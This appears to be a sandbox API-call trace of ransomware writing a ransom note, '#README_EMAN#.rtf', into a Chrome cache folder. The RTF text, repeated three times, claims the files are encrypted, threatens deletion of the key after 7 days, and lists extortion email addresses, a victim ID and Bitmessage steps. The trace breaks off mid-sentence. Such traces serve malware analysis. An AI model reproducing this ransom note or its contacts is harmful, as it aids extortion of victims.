[0292.244] GetLastError () returned 0x2 [0292.244] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must 